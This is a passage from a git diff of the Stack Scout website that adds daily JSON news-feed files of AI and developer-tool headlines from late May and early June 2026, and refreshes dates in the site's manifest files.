"date": "2026-05-28T05:18:10.290Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Vulnerability found in framework used by VLLM, many MCP servers, and other LLM tools", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp2th/vulnerability_found_in_framework_used_by_vllm/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-28T01:27:29.000Z", + "summary": "Worth taking a look to see if this affects any of you. Surprised nobody has posted it yet.", + "category": "ai_models" + }, + { + "title": "GH200 NVL2 or 8x RTX 6000 Blackwell for running Kimi K2.6 / DeepSeek V4 locally? (5 devs, agentic coding)", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tpp0a7/gh200_nvl2_or_8x_rtx_6000_blackwell_for_running/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-28T01:24:20.000Z", + "summary": "Trying to figure out the right box for my team and wanted to see if anyone had any clue which would be a better fit or if it is not worth our time in our budget. Situation: 5 of us doing agentic coding (lots of long context getting re-sent every turn, parallel tool calls, etc.) and we want to self-host the latest open MoE models — Kimi K2.6 and DeepSeek V4 class. My boss likes the idea of having it in house so no point in just saying pay the API (I did pitch that) Budget is around $100k - $150k. I'm stuck between a dual GH200 NVL2 (cheaper, \\~1.2TB unified memory) (about 95k) and an 8x RTX 6000 Pro Blackwell build (768GB of actual fast VRAM, more expensive) (about 140k). To get real numbers I rented a single GH200 and tested Kimi K2.6 at a 2-bit quant. After some playing around I got it up to \\~23 tok/s decode, which is not bad considering it is one GH200 with only 96gb of HBM, but I am not sure how it will scale to the dual GH200. The prefill was pretty slow yet again not sure how it will scale. The thing I keep coming back to: these models are too big to fit in HBM no matter what. Even the NVL2's 288GB HBM3e can't hold them, so the model partially lives in the slower unified mem…", + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-29.json b/data/news-feed-2026-05-29.json new file mode 100644 index 0000000..f69c931 --- /dev/null +++ b/data/news-feed-2026-05-29.json @@ -0,0 +1,259 @@ +{ + "generated": "2026-06-05T00:44:44.652Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-29", + "article_count": 15, + "archived_story_count": 468, + "articles": [ + { + "title": "Runway Exposes Gen-4.5, Kling, and GPT Image 2 via MCP — Creative Models Now Callable Inside Claude, Cursor, and Replit Agents", + "url": "https://x.com/runtimewire/status/2059782827927810437", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T12:05:45.033Z", + "summary": "Runway plugged its creative model suite into Claude, ChatGPT, Cursor, and Replit via MCP, making image and video generation callable directly inside AI agent workflows. Runway Gen-4.5, Kling, and GPT Image 2 are all exposed through the integration.", + "category": "ai_tools" + }, + { + "title": "Kling AI Skill Launches for Agent Workflows — Text-to-Video, 4K Images, and Cross-Scene Consistency in Claude and Cursor", + "url": "https://x.com/MayorKingAI/status/2044455291664695688", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "tool_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T12:05:45.033Z", + "summary": "Kling AI launched a dedicated Skill for AI agent workflows, enabling text/image to video generation, 4K image generation, style transfer, and cross-scene consistency with custom elements. Works natively with Claude, Cursor, Copilot, Codex, and OpenClaw.", + "category": "ai_tools" + }, + { + "title": "Motion Launches Motion API — Connect the AI Motion Design Tool Directly Into Claude, Codex, OpenClaw, and Hermes", + "url": "https://x.com/_adishj/status/2060028771399500237", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-28T17:59:08.283Z", + "summary": "Motion released the Motion API, enabling one-click integration of the AI motion design tool directly into Claude, Codex, OpenClaw, Hermes, and other AI frameworks. Agents can now generate motion design content as part of automated creative workflows.", + "category": "ai_tools" + }, + { + "title": "X Square Robot Releases Open-Source WALL-WM World Model For Embodied AI", + "url": "https://www.digg.com/ai/v4d0ka2f", + "source": "Digg AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.045Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anthropic Releases Opus 4.8 With Strong Agentic Coding Benchmarks", + "url": "https://www.digg.com/ai/6gzrebez", + "source": "Digg AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.038Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "ElevenLabs Launches Dubbing V2 — SOTA Audio-to-Audio Dubbing That Preserves Emotion in 90+ Languages", + "url": "https://x.com/Carles_Reina/status/2060035887946248616", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-28T17:59:08.282Z", + "summary": "ElevenLabs introduced Dubbing V2, described as the world's state-of-the-art model for high-quality dubbing. The Audio-to-Audio model preserves the original speaker's emotion and intent across 90+ languages. Available now through ElevenCreative, with API access coming soon.", + "category": "ai_tools" + }, + { + "title": "Hexo Releases SIA — Open-Source Self-Improving AI That Updates Its Own Weights During Goal Pursuit", + "url": "https://x.com/kunalbhatia91/status/2060013228231725092", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-28T17:54:34.974Z", + "summary": "Hexo released SIA, an open-source Self-Improving AI that achieves goals through recursive self-improvement — updating its own capabilities as it works toward a goal, not just calling tools with fixed capabilities. The announcement earned 221 likes and 80,000 views.", + "category": "ai_tools" + }, + { + "title": "Shift Launches in NYC — AI Economy Startup Offers Free Home Cleaning to Bridge Today's Economy to the AI Abundance Era", + "url": "https://x.com/bercankilic/status/2060043312606638245", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-28T17:49:05.507Z", + "summary": "Shift launched in New York City with a mission to bridge the current economy into the AI economy where goods, services, and leisure become affordable through AI. The launch includes free home cleaning as the entry product.", + "category": "ai_tools" + }, + { + "title": "minWM: A Full-Stack Open-Source Framework for Real-Time Interactive Video World Models", + "url": "https://paperswithcode.com/papers/2605.30263", + "source": "Papers With Code", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.9, + "date": "2026-05-29T15:24:25.298Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "DeepSeek's Deli Chen releases an LLM continual learning survey paper generated autonomously by the DeliAutoResearch systemIt maps out self-improvement methods like STaR and o1.", + "url": "https://www.digg.com/ai/xay55qwq", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.054Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "ElevenLabs Releases Dubbing V2 With Emotion-Preserving Multilingual Audio", + "url": "https://www.digg.com/ai/hsa7ykbd", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.027Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "OpenAI launches Rosalind Biodefense, giving U.S. government agencies access to its specialized GPT-Rosalind modelThe initiative focuses on defending against engineered pathogens.", + "url": "https://www.digg.com/ai/dl0e6ofa", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.024Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Anthropic releases Claude Opus 4.8 with improved coding and agentic performance at the same price as Opus 4.7", + "url": "https://www.digg.com/ai/a6c6c36e-38c7-4420-9908-d435740c4ac8", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T15:24:17.014Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "100% AI Product Videos Made in Under 5 Minutes Achieve Commercial Quality — Realism Framework Hits New Threshold", + "url": "https://x.com/Mho_23/status/2048507307466658062", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-29T12:05:45.033Z", + "summary": "AI-generated product videos made in under 5 minutes are reaching commercial marketing quality, with a realism framework demonstrating results compelling enough for real product ads. The UGC video format has become the clearest commercial use case for AI video generation.", + "category": "ai_tools" + }, + { + "title": "Garry Tan Endorses Hermes Agent Stack — YC President's 600-Like Post Signals Mainstream Adoption", + "url": "https://x.com/garrytan/status/2052434681363321056", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-29T12:02:13.220Z", + "summary": "Y Combinator President Garry Tan publicly endorsed his OpenClaw/Hermes Agent setup as significantly improved, with the post generating 600+ likes. The endorsement signals that open-source agent coordination has crossed from early adopter into mainstream developer infrastructure.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-30.json b/data/news-feed-2026-05-30.json new file mode 100644 index 0000000..3ec9f9e --- /dev/null +++ b/data/news-feed-2026-05-30.json @@ -0,0 +1,243 @@ +{ + "generated": "2026-06-05T00:44:44.837Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-30", + "article_count": 15, + "archived_story_count": 214, + "articles": [ + { + "title": "Show HN: VT Code – open-source terminal coding agent in Rust", + "url": "https://github.com/vinhnx/VTCode", + "source": "Hacker News", + "tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool", + "agent_tool" + ], + "importance": 0.82, + "date": "2026-05-30T03:07:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenAI releases Codex v26.527, enabling Windows computer use and remote desktop control from mobile devicesA new profile interface tracks token activity and usage statistics.", + "url": "https://www.digg.com/ai/2cvxmdwh", + "source": "Digg AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.453Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Oura Ring 5 Launches — 40% Smaller Than Ring 4, Blood Pressure Monitoring, Ships June 4 at $399", + "url": "https://ouraring.com/blog/oura-ring-5", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-29T23:40:17.517Z", + "summary": "Oura launched Ring 5, the world's smallest smart ring at 40% smaller than Ring 4, starting at 2 grams. New features include blood pressure change monitoring, sleep apnea detection, and an AI health coach. Ships June 4, $399.", + "category": "ai_tools" + }, + { + "title": "Cursor Releases Developer Habits Report on AI Coding Trends", + "url": "https://www.digg.com/ai/6jh7d90b", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.474Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Brilliant Launches Koji AI Tutor to Build Kids' Critical Thinking", + "url": "https://www.digg.com/ai/9jzt6gwc", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.461Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Shift Launches Free NYC Cleaning to Gather Robotics Training Data", + "url": "https://www.digg.com/ai/5ol0wuf6", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-30T05:18:16.459Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Mythos-Class AI Models Coming to All Customers in Weeks — Anthropic Confirms Safeguards Ready After Restricted Testing", + "url": "https://www.bloomberg.com/news/articles/2026-05-28/anthropic-plans-wide-release-of-mythos-level-ai-models-in-weeks", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-29T23:40:17.517Z", + "summary": "Anthropic confirmed through Bloomberg and Axios that Mythos-class models — previously limited to select testers under Project Glasswing due to cyber capabilities — will reach general availability in coming weeks after completing safety validation.", + "category": "ai_tools" + }, + { + "title": "Mystery Company Burns $500M on Claude in One Month — Token Budget Collapse Exposes Enterprise AI Cost Controls Gap", + "url": "https://www.tomshardware.com/tech-industry/ai/mystery-company-accidentally-blew-500-million-on-claude-ai-in-a-single-month", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-05-29T23:37:37.979Z", + "summary": "An unidentified company accidentally spent $500 million on Claude API in a single month after failing to set usage limits on employee licenses, per Tom's Hardware and WSJ. Amazon's concurrent token leaderboard shutdown after employees gamed it reveals tokenmaxxing as a systemic enterprise risk.", + "category": "ai_tools" + }, + { + "title": "Bun Rewrote Itself in Rust in 6 Days Using Claude Dynamic Workflows — Jarred Sumner Confirms 'Anthropic Launch Stunt'", + "url": "https://x.com/jarredsumner/status/2060XXX", + "source": "Aligned News (Scoble)", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-29T23:37:37.979Z", + "summary": "Jarred Sumner confirmed that Bun's headline-grabbing Rust rewrite in 6 days was made possible by Claude Code's Dynamic Workflows — and a Bluesky user noted it was 'an Anthropic launch stunt.' The incident illustrates both the genuine capability of agentic coding and the coordinated nature of AI marketing.", + "category": "ai_tools" + }, + { + "title": "wolfSSL releases a new product; wolfCOSE a zero alloc C embbedded COSE stack", + "url": "https://github.com/wolfSSL/wolfCOSE", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9400000000000001, + "date": "2026-05-30T20:42:28.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenAI Extends Codex Computer Use To Windows", + "url": "https://www.digg.com/ai/24n5kcme", + "source": "Digg AI", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.94, + "date": "2026-05-30T05:18:16.464Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Brilliant founder Sue Khim launches Koji, an interactive AI tutor that coaches children through math and coding without giving direct answersIt personalizes lessons using a decade of student learning data", + "url": "https://www.digg.com/ai/hqutws0i", + "source": "Digg AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.94, + "date": "2026-05-30T05:18:16.456Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Kore: Binary File Format Optimized for Modern Data Systems (Open Source)", + "url": "https://github.com/arunkatherashala/Kore", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8899999999999999, + "date": "2026-05-30T20:54:22.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "ChatGPT — Release Notes", + "url": "https://help.openai.com/en/articles/6825453-chatgpt-release-notes#:~:text=May%2028%2C%202026,models%20are%20sunset.", + "source": "The Verge AI", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.76, + "date": "2026-05-30T05:18:42.413Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Show HN: Open Envelope – an open schema for defining AI agent teams", + "url": "https://openenvelope.org/docs/schema/", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.75, + "date": "2026-05-28T20:30:20.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-31.json b/data/news-feed-2026-05-31.json new file mode 100644 index 0000000..8ba62ae --- /dev/null +++ b/data/news-feed-2026-05-31.json @@ -0,0 +1,25 @@ +{ + "generated": "2026-06-05T00:44:45.119Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-31", + "article_count": 1, + "archived_story_count": 98, + "articles": [ + { + "title": "Show HN: Breathe CLI – Paced resonance breathing in the macOS terminal", + "url": "https://github.com/marekkowalczyk/breathe-cli", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.7699999999999999, + "date": "2026-05-30T20:30:53.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-01.json b/data/news-feed-2026-06-01.json new file mode 100644 index 0000000..08dc6f1 --- /dev/null +++ b/data/news-feed-2026-06-01.json @@ -0,0 +1,85 @@ +{ + "generated": "2026-06-05T00:44:45.419Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-06-01", + "article_count": 5, + "archived_story_count": 220, + "articles": [ + { + "title": "Nvidia announces new AI chip for personal computers", + "url": "https://www.bbc.com/news/articles/crmp9mppvzro", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-06-01T10:33:25.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "AI Agent Guidelines for CS336 at Stanford", + "url": "https://github.com/stanford-cs336/assignment1-basics/blob/main/CLAUDE.md", + "source": "Hacker News", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.91, + "date": "2026-06-01T16:41:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "OpenAI frontier models and Codex are now available on AWS", + "url": "https://openai.com/index/openai-frontier-models-and-codex-are-now-available-on-aws/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.83, + "date": "2026-06-01T21:50:02.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Malicious npm packages detected across Red Hat Cloud Services", + "url": "https://github.com/RedHatInsights/javascript-clients/issues/492", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.83, + "date": "2026-06-01T13:30:21.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Movwin: My (Unpublished) TUI Framework", + "url": "https://movq.de/blog/postings/2026-05-29/0/POSTING-en.html", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.7699999999999999, + "date": "2026-05-30T01:07:42.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-02.json b/data/news-feed-2026-06-02.json new file mode 100644 index 0000000..48cbc39 --- /dev/null +++ b/data/news-feed-2026-06-02.json @@ -0,0 +1,72 @@ +{ + "generated": "2026-06-05T00:44:45.626Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-06-02", + "article_count": 4, + "archived_story_count": 241, + "articles": [ + { + "title": "Microsoft announces Scout, an autonomous AI agent built on OpenClaw", + "url": "https://www.computerworld.com/article/4180103/microsoft-unveils-scout-an-autonomous-ai-agent-built-on-openclaw.html", + "source": "Hacker News", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-06-02T18:19:27.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Alphabet announces $80B equity capital raise to expand AI infra and compute", + "url": "https://abc.xyz/investor/news/news-details/2026/Alphabet-Announces-Proposed-80-Billion-Equity-Capital-Raise-to-Expand-AI-Infrastructure-and-Compute-2026-b0myAMewCa/default.aspx", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-06-01T20:55:15.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "HP re-releases classic computer science calculator: The HP-16C", + "url": "https://hpcalcs.com/product/hp-16c-collectors-edition/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9400000000000001, + "date": "2026-06-02T19:02:40.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Apple rejected my dictation app for using the accessibility API", + "url": "https://www.mitmllc.com/blog/apple-rejected-my-dictation-app/", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.86, + "date": "2026-06-02T12:00:03.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-03.json b/data/news-feed-2026-06-03.json new file mode 100644 index 0000000..473709d --- /dev/null +++ b/data/news-feed-2026-06-03.json @@ -0,0 +1,102 @@ +{ + "generated": "2026-06-05T00:44:45.899Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-06-03", + "article_count": 6, + "archived_story_count": 269, + "articles": [ + { + "title": "Ableton Extensions SDK", + "url": "https://www.ableton.com/en/live/extensions/", + "source": "Hacker News", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.8200000000000001, + "date": "2026-06-03T20:39:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Gooey: A GPU-accelerated UI framework for Zig", + "url": "https://github.com/duanebester/gooey", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-06-03T17:12:27.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Capstone – multi-platform, multi-architecture disassembly framework", + "url": "https://www.capstone-engine.org/", + "source": "Hacker News", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-06-03T01:59:46.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Skyvern (YC S23) Is Hiring Open-Source Loving DevRel Engineers", + "url": "https://www.ycombinator.com/companies/skyvern/jobs/1qRTlVx-founding-developer-marketing-open-source-ai", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8899999999999999, + "date": "2026-06-03T17:01:00.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Roku LT Operating System open source distribution", + "url": "https://blog.roku.com/developer/roku-lt-os", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.86, + "date": "2026-06-03T01:13:38.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Journey to JPEG XL: open-source experiments shaped the future of image coding", + "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6599999999999999, + "date": "2026-06-03T21:55:23.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-04.json b/data/news-feed-2026-06-04.json new file mode 100644 index 0000000..2931428 --- /dev/null +++ b/data/news-feed-2026-06-04.json @@ -0,0 +1,86 @@ +{ + "generated": "2026-06-04T21:49:41.031Z", + "site": "Stack Scout", + "article_count": 5, + "articles": [ + { + "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", + "url": "https://github.com/anthropics/defending-code-reference-harness", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-04T20:11:20.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Ableton Extensions SDK", + "url": "https://www.ableton.com/en/live/extensions/", + "source": "Hacker News", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-03T20:39:34.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Show HN: Open Terminal – A Bloomberg Style App for Research", + "url": "https://tesseractanalytics.ai/", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-04T15:58:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Meta's ships facial recognition on smart glasses", + "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.48, + "date": "2026-06-04T19:36:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Journey to JPEG XL: open-source experiments shaped the future of image coding", + "url": "https://opensource.googleblog.com/2026/06/journey-to-jpeg-xl-how-open-source-experiments-shaped-the-future-of-image-coding.html", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.48, + "date": "2026-06-03T21:55:23.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-05.json b/data/news-feed-2026-06-05.json new file mode 100644 index 0000000..32afd3d --- /dev/null +++ b/data/news-feed-2026-06-05.json @@ -0,0 +1,84 @@ +{ + "generated": "2026-06-05T17:45:11.045Z", + "site": "Stack Scout", + "article_count": 5, + "articles": [ + { + "title": "Anthropic's open-source framework for AI-powered vulnerability discovery", + "url": "https://github.com/anthropics/defending-code-reference-harness", + "source": "Hacker News", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.5599999999999999, + "date": "2026-06-04T20:11:20.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Open Code Review – An AI-powered code review CLI tool", + "url": "https://github.com/alibaba/open-code-review", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.48, + "date": "2026-06-05T00:04:29.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Meta's ships facial recognition on smart glasses", + "url": "https://www.buchodi.com/meta-glasses-facial-recognition/", + "source": "Hacker News", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 0.48, + "date": "2026-06-04T19:36:48.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "databow: a Rust CLI to query any database with an ADBC driver", + "url": "https://columnar.tech/blog/introducing-databow//", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.48, + "date": "2026-06-02T23:11:13.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Branchless Quicksort faster than std:sort and pdqsort with C and C++ API", + "url": "https://tiki.li/blog/blqsort", + "source": "Hacker News", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.48, + "date": "2026-06-02T20:00:54.000Z", + "summary": null, + "category": "tech_general" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-06-06.json b/data/news-feed-2026-06-06.json new file mode 100644 index 0000000..842deea --- /dev/null +++ b/data/news-feed-2026-06-06.json @@ -0,0 +1,6 @@ +{ + "generated": "2026-06-06T12:00:13.600Z", + "site": "Stack Scout", + "article_count": 0, + "articles": [] +} \ No newline at end of file diff --git a/data/news-feed-latest.json b/data/news-feed-latest.json new file mode 100644 index 0000000..842deea --- /dev/null +++ b/data/news-feed-latest.json @@ -0,0 +1,6 @@ +{ + "generated": "2026-06-06T12:00:13.600Z", + "site": "Stack Scout", + "article_count": 0, + "articles": [] +} \ No newline at end of file diff --git a/data/page-registry.json b/data/page-registry.json index 33a29ae..b3cacce 100644 --- a/data/page-registry.json +++ b/data/page-registry.json @@ -1,6 +1,6 @@ { "title": "Stack Scout // Page Registry", - "generatedAt": "2026-06-04", + "generatedAt": "2026-06-06", "pages": [ { "key": "home", diff --git a/data/radar-manifest.json b/data/radar-manifest.json index 7d7a77b..29ddbed 100644 --- a/data/radar-manifest.json +++ b/data/radar-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Radar", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "items": [ { "title": "Azure MCP Server", diff --git a/data/tools-manifest.json b/data/tools-manifest.json index dee2917..8074788 100644 --- a/data/tools-manifest.json +++ b/data/tools-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Tools Manifest", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe catalog for Stack Scout.", "counts": { "total": 14, diff --git a/data/updates-manifest.json b/data/updates-manifest.json index 779cf1b..21ac358 100644 --- a/data/updates-manifest.json +++ b/data/updates-manifest.json @@ -1,7 +1,7 @@ { "title": "Stack Scout // Updates", - "generatedAt": "2026-06-04", - "updatedAt": "2026-06-04", + "generatedAt": "2026-06-06", + "updatedAt": "2026-06-06", "summary": "Public-safe activity stream seeded from official or first-party sources.", "items": [ { diff --git a/index.html b/index.html index ec7781b..7805e61 100644 --- a/index.html +++ b/index.html @@ -833,7 +833,7 @@

          From the Stack Scout Lab

          diff --git a/method/index.html b/method/index.html index aa83e0d..6a0e17f 100644 --- a/method/index.html +++ b/method/index.html @@ -201,7 +201,7 @@

